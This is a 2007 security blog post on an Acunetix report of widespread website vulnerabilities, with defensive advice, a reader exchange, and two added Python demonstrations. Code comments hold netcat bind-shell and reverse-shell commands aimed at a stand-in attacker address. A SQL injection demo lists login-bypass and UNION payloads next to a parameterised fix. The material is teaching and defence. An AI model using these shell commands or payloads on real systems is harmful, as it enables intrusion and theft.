91% of web sites are hackable…find out what to do about it

by ron on March 3, 2007

Acunetix recently reported that:

… on average, 91% of the Web sites scanned contained some form of Web site vulnerability. Those exploits ranged from the more serious, such as SQL Injection and Cross Site Scripting, to more minor ones, like local path disclosure or directory listing.

Out of 3,200 sites scanned, 70% had vulnerabilities with either a medium- or high-risk rating

I would like to say that I can’t believe that the numbers are that high, but the reality is that it doesn’t surprise me.


Three main factors:

  • web servers (and web applications) have, and will continue to have vulnerabilities which can be exploited by hackers
  • existing conventional firewalls are almost useless in preventing these attacks
  • there’s an extreme lack of people who understand security from a hacking perspective

Web servers will continue to come out with new versions and keep adding new features in order to remain competitive and not get pushed out of the market. Every new feature is new code, and code written in a hurry is where the next vulnerabilities get found. So I doubt that this factor will ever go away.

Hopefully web server vendors will increasingly get their developers trained in security, so that they can learn how to “protect” their code from attack. This will definitely help, but it won’t make the problem go away. New vulnerabilities will consistently be found in new web server software releases.

The second factor is what really bugs me though. People don't realise that a conventional packet-filtering firewall, which decides on IP addresses and port numbers (layers 3 and 4) and never looks at what is inside the connection, is almost useless against an experienced hacker when it comes to protecting your network.

And what bugs me the most is that so-called security experts don't know the first thing about hacking. It's no wonder then that their advice of using conventional firewalls is resulting in this astronomically high figure of sites that are vulnerable to attack.

Every so-called security expert I’ve met so far didn’t know what I was talking about when I asked them if their recommended firewall could prevent a netcat session going through it. I just got a blank stare, and a few seconds later they asked “what’s netcat?”

For a security person to not know what netcat is, is the equivalent of a network engineer not knowing what the ping utility is, or a chief financial officer not knowing what the acronym ROI stands for. It is the single most basic (yet extremely powerful) hacking tool around. Hackers know it as the “TCP/IP swiss army knife” since you can use it to do almost anything. If your security consultant doesn’t know what netcat is or how it can be used, then I’m sorry, but it’s game over for you.

It's been estimated that around 80% of all hacks and exploits make use of the netcat utility in some fashion. I can't say that I personally believe that the number is that high, but netcat (or a tool that does the same job) turns up in a large share of real intrusions: once an exploit gives the attacker a foothold, netcat is the quickest way to push a shell back out through the firewall on a port that is already allowed, and to move files in and out over that same connection.

Let’s take a closer look at some of the data discovered in the Acunetix report.

Most common vulnerabilities (chart from the Acunetix report)

Firstly, notice that almost all of the vulnerabilities found were application-level vulnerabilities.

To repeat what I mentioned before, a traditional (packet-filtering) firewall would do absolutely nothing to prevent these attacks: they arrive inside ordinary HTTP requests on port 80 or 443, which the firewall has to allow through for the site to work at all.

Trend (chart from the Acunetix report)

The second interesting thing to note from the report is the steadily increasing trend in the number of vulnerable sites. This is simply a result of more websites going online all the time. I don't see this ever changing, so we can expect the number of sites vulnerable to attack to keep growing.

Ok, so that’s probably lit a fire under your butt, and you now want to know what to do about it.

Action items:

  • Start educating yourself on the topic of network security. A great way to start is by reading a book called Hacking Exposed
  • If you don’t have the time to learn about network security, then hire someone that does. But remember that most security people don’t have a clue about how to defend against hackers. I would suggest that you ask them about: netcat, cross site scripting vulnerabilities, and sql injection attacks. If you get a blank stare, then find someone else.
  • Realize that a traditional firewall won't help you one bit in protecting from application-layer attacks. Put a strong application-layer firewall (a web application firewall) in front of your web servers, and keep the packet filter for what it is good at, which is limiting which hosts and ports are reachable at all.
  • Keep all servers patched, especially those that provide services to the internet. The days of waiting 3 months to make sure that a patch "is stable" are gone. Working exploits now appear within hours of a vulnerability being disclosed. Patch your systems quickly, but do ensure that you have a roll-back strategy.
  • Restrict the traffic allowed through your firewall. Ideally, you should never have direct access from the internet to the internal network segment (most people understand this but do very little about it), or from the internal network segment to the internet (almost nobody understands that this is a huge security risk: an "allow anything outbound" rule is exactly what a reverse shell from a compromised internal host needs).
  • Make use of relays/proxies in a Demilitarized Zone, so that internet-facing services never talk directly to internal hosts and internal hosts reach the internet only through the proxy
  • Make sure that your edge devices (firewall, routers, etc) are properly logging information and that you regularly go through the logs
  • Consider using an Intrusion Prevention System
  • Run vulnerability scans (or penetration tests) on your own systems, and then plug up the holes. Acunetix are currently offering a free security scan you could make use of.
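The netcat point and the egress-filtering point above, in one runnable form. This is an added example written for this post, not code from the original page or from Acunetix: a toy packet filter that decides only on addresses and ports, next to an application-layer check that looks at the first bytes of the stream, and a second egress policy that only lets internal hosts talk to a proxy. All addresses (RFC 5737 documentation ranges), ports, rules and payloads are constructed for illustration; the netcat command lines in the comments are the ordinary ones for a bind shell and a reverse shell.

```python
"""
Toy model of why a port-level packet filter cannot tell a netcat session
from web traffic, and what proxy-only egress changes.  Added example for
this post (not from the original page or Acunetix); every address, port,
rule and payload is constructed for illustration.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Conn:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    first_bytes: bytes  # first bytes seen on the stream after the TCP handshake


# --- layer 3/4: all that a conventional packet filter ever sees ---------------
DMZ_WEB = "192.0.2.10"             # constructed: public web server in the DMZ
PROXY = "192.0.2.20"               # constructed: outbound relay/proxy in the DMZ
PROXY_PORT = 3128
INTERNAL_PREFIX = "10.0.0."        # constructed: internal segment
INGRESS_PORTS = {80, 443}          # internet -> DMZ web server
EGRESS_PORTS_OPEN = {80, 443, 53}  # the usual "people need the web" outbound rule


def is_internal(ip):
    return ip.startswith(INTERNAL_PREFIX)


def packet_filter(conn, proxy_only=False):
    """Verdict of an address/port filter.  It never reads conn.first_bytes:
    payload is invisible at this layer, so a netcat shell on 443 and a
    browser on 443 are the same thing to it."""
    if not is_internal(conn.src_ip):
        # inbound: only the DMZ web server, only on web ports
        return conn.dst_ip == DMZ_WEB and conn.dst_port in INGRESS_PORTS
    if proxy_only:
        # hardened egress: internal hosts may talk to the proxy and nothing else
        return conn.dst_ip == PROXY and conn.dst_port == PROXY_PORT
    return conn.dst_port in EGRESS_PORTS_OPEN


def filter_log_line(conn, allowed):
    """What the firewall log records: the 5-tuple and the verdict, nothing more."""
    verdict = "ALLOW" if allowed else "DENY"
    return f"{verdict} tcp {conn.src_ip}:{conn.src_port} -> {conn.dst_ip}:{conn.dst_port}"


# --- layer 7: what an application-layer firewall or proxy can check -----------
HTTP_REQUEST_LINE = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r\n")


def looks_like_http(first_bytes):
    return HTTP_REQUEST_LINE.match(first_bytes) is not None


def app_firewall(conn, proxy_only=False):
    """Port filter plus a protocol check: a stream on a web port must speak HTTP."""
    return packet_filter(conn, proxy_only) and looks_like_http(conn.first_bytes)


def verdicts(conn, proxy_only=False):
    return {"packet_filter": packet_filter(conn, proxy_only),
            "app_firewall": app_firewall(conn, proxy_only)}


# --- constructed traffic --------------------------------------------------------
ATTACKER = "203.0.113.9"
INTERNET_SITE = "203.0.113.50"
# ordinary visitor to the DMZ web server
browser = Conn("198.51.100.7", 52011, DMZ_WEB, 80,
               b"GET /index.html HTTP/1.1\r\nHost: www.example.com\r\n\r\n")
# attacker talking to a listener left on the DMZ box:  nc -l -p 443 -e /bin/sh
bind_shell = Conn(ATTACKER, 52012, DMZ_WEB, 443, b"id; uname -a\n")
# same listener on a non-web port:  nc -l -p 4444 -e /bin/sh
bind_shell_4444 = Conn(ATTACKER, 52013, DMZ_WEB, 4444, b"id\n")
# compromised internal host calling home:  nc 203.0.113.9 443 -e /bin/sh
reverse_shell = Conn("10.0.0.23", 40112, ATTACKER, 443, b"uid=33(www-data) gid=33(www-data)\n")
# an internal user browsing some web site on the same port
internal_browser = Conn("10.0.0.23", 40113, INTERNET_SITE, 443,
                        b"GET / HTTP/1.1\r\nHost: example.org\r\n\r\n")
# the same user once egress is proxy-only
via_proxy = Conn("10.0.0.23", 40114, PROXY, PROXY_PORT,
                 b"GET http://example.org/ HTTP/1.1\r\nHost: example.org\r\n\r\n")


if __name__ == "__main__":
    for name, c in [("browser", browser), ("bind_shell", bind_shell),
                    ("bind_shell_4444", bind_shell_4444),
                    ("reverse_shell", reverse_shell), ("internal_browser", internal_browser)]:
        print(f"{name:16} {verdicts(c)}   log: {filter_log_line(c, packet_filter(c))}")
    print("with proxy-only egress:")
    for name, c in [("reverse_shell", reverse_shell), ("via_proxy", via_proxy)]:
        print(f"{name:16} {verdicts(c, proxy_only=True)}")
```

Two things to notice in the output. The packet filter allows the bind shell on 443 and the reverse shell out to 443 exactly as it allows the browsers, and the log lines it writes for the reverse shell and for the internal user's HTTPS session have the same shape, so reading the firewall log alone will not find the shell; only the check on the first bytes of the stream separates them. Switching egress to proxy-only stops the reverse shell at layer 3/4 before any payload inspection is needed, which is the point of the "restrict internal-to-internet traffic" and "use proxies in a DMZ" items.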

Since one of the biggest problems is that security people are unaware of how to hack, and therefore completely unaware of how to protect against these hacks, I’m going to be creating posts over the coming weeks showing you step-by-step exactly how to carry out a hack against a network.

Yes, this will make it easier for "script kiddies" to follow an easy guide to compromise your systems, but it's the only way to do something about this problem.


2 comments

Ian M March 5, 2007 at 3:24 pm

We must remember that there is a difference between a 'system vulnerability' and a hole so big that it will allow you to hijack a system. Most vulnerabilities relate to the ability of a 'hacker' to cause a web server to stop functioning and/or crash.
This is a very different story to be able to hop from a web server to the back-end sql database etc.

Just my 2 cents worth.


Ron Bertino March 5, 2007 at 9:48 pm

Hi Ian

You’ll notice from the Acunetix report that out of the 91% of sites with vulnerabilities, 42% of them had cross-site scripting vulnerabilities and 50% of them were vulnerable to sql injection attacks.

Cross site scripting attacks make the client that is accessing the vulnerable server vulnerable to attack. In other words, the user is at risk, not the web server, in this instance.

So you’re correct in saying that the cross-site scripting attacks would not lead to being able to compromise the target network that had the vulnerable server.

In contrast though, 50% of systems were vulnerable to sql injection attacks. This does mean that the target web server is vulnerable to attack. Even worse, a susceptible web server could then allow the hacker to completely take over the entire internal network.

SQL injection attacks can be very nasty, and can literally mean having your entire internal network coming under the hacker’s control.
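The SQL injection step from the reply above, shown in runnable form. This is an added example, not code from the original post, from the comments or from Acunetix: the same login check written with string concatenation and with a bound-parameter query, run against an in-memory SQLite database. The schema, the accounts, the api_keys table and the attack strings are all constructed for illustration. The same strings work against any SQL backend that accepts single quotes and `--` comments; the follow-on step of turning database access into control of the host depends on the backend and is not shown here.

```python
"""
The same login check written two ways, run against SQLite in memory.
Added example for this post (not from the page or its comments); the
schema, rows and attack strings are constructed for illustration.
"""
import sqlite3


def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, role TEXT);
        INSERT INTO users (username, password, role) VALUES
            ('alice', 'correct horse', 'admin'),
            ('bob',   'hunter2',       'user');
        -- a table the login form was never meant to expose
        CREATE TABLE api_keys (owner TEXT, secret TEXT);
        INSERT INTO api_keys VALUES ('billing', 'sk-constructed-example-key');
    """)
    return db


def login_vulnerable(db, username, password):
    """The classic mistake: user input spliced into the SQL text, so a quote
    in the input ends the string literal and the rest is parsed as SQL."""
    sql = ("SELECT username, role FROM users WHERE username = '" + username
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchall()


def login_safe(db, username, password):
    """Bound parameters: the driver passes the values separately from the
    statement, so input can never change the query's structure."""
    sql = "SELECT username, role FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchall()


# constructed attack strings
BYPASS_AS_ALICE = "alice' --"                                       # comment out the password check
TAUTOLOGY = "' OR '1'='1"                                           # make the WHERE clause match every row
READ_OTHER_TABLE = "' UNION SELECT owner, secret FROM api_keys --"  # pull rows from a different table


if __name__ == "__main__":
    db = make_db()
    for label, fn in [("vulnerable", login_vulnerable), ("safe", login_safe)]:
        print(f"--- {label} ---")
        print("bob / hunter2       :", fn(db, "bob", "hunter2"))
        print("alice' --           :", fn(db, BYPASS_AS_ALICE, "anything"))
        print("' OR '1'='1         :", fn(db, TAUTOLOGY, TAUTOLOGY))
        print("UNION ... api_keys  :", fn(db, READ_OTHER_TABLE, "x"))
```

With the concatenated query, the first string logs in as the admin without a password, the second returns every account, and the third reads a table the login form never touches. The parameterised version returns nothing for all three, because the driver treats the whole input as a value to compare against, never as SQL.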

